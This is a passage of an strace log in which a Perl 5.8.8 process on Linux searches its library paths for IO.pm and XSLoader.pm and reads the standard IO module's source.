5834  07:10:56.121898 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9c0a28) = -1 ENOTTY (Inappropriate ioctl for device)

5834  07:10:56.121908 _llseek(1, 0, [0], SEEK_CUR) = 0

5834  07:10:56.121919 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

5834  07:10:56.121930 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

5834  07:10:56.121948 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

5834  07:10:56.121999 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

5834  07:10:56.122041 getppid()         = 5832

5834  07:10:56.122143 stat64("/etc/perl/IO.pmc", 0xbf9c071c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122158 stat64("/etc/perl/IO.pm", 0xbf9c062c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122171 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbf9c071c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122183 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbf9c062c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122196 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbf9c071c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122208 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbf9c062c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122221 stat64("/usr/lib/perl5/IO.pmc", 0xbf9c071c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122233 stat64("/usr/lib/perl5/IO.pm", 0xbf9c062c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122245 stat64("/usr/share/perl5/IO.pmc", 0xbf9c071c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122257 stat64("/usr/share/perl5/IO.pm", 0xbf9c062c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122269 stat64("/usr/lib/perl/5.8/IO.pmc", 0xbf9c071c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122282 stat64("/usr/lib/perl/5.8/IO.pm", {st_mode=S_IFREG|0644, st_size=413, ...}) = 0

5834  07:10:56.122302 open("/usr/lib/perl/5.8/IO.pm", O_RDONLY|O_LARGEFILE) = 6

5834  07:10:56.122315 ioctl(6, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9c0438) = -1 ENOTTY (Inappropriate ioctl for device)

5834  07:10:56.122327 _llseek(6, 0, [0], SEEK_CUR) = 0

5834  07:10:56.122349 read(6, "#\n\npackage IO;\n\nuse XSLoader ();\nuse Carp;\nuse strict;\nuse warnings;\n\nour $VERSION = \"1.22\";\nXSLoader::load \'IO\', $VERSION;\n\nsub import {\n    shift;\n\n    warnings::warnif(\'deprecated\', qq{Parameterless \"use IO\" deprecated})\n        if @_ == 0 ;\n    \n    my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir);\n\n    eval join(\"\", map { \"require IO::\" . (/(\\w+)/)[0] . \";\\n\" } @l)\n\tor croak $@;\n}\n\n1;\n\n__END__\n\n", 4096) = 413

5834  07:10:56.122409 stat64("/etc/perl/XSLoader.pmc", 0xbf9c026c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122422 stat64("/etc/perl/XSLoader.pm", 0xbf9c017c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122435 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pmc", 0xbf9c026c) = -1 ENOENT (No such file or directory)

5834  07:10:56.122447 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pm", 0xbf9c017c) = -1 ENOENT (No such file or directory)

